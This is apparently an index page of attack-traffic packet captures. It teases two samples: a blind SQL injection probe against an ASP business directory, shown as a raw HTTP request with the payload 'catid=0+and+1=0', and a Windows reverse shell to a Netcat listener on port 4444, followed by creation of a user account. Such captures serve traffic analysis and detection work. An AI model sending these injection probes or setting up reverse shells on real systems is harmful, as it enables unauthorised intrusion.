Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP > Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1Host: www.activewebsoftwares.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/2008120122 Firefox/3.0.5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gb,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-alive 2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP > Flags [.], … Read more

Converted PCAP sample of a Microsoft Windows Reverse Shell

Converted PCAP sample of a Microsoft Windows Reverse Shell, the shell is spawned on port 4444, the hacked PC initiates the connection to which has a Netcat listener waiting on port 4444 to spawn a command line shell on connect. You can see once the shell is spawned a user is created and added … Read more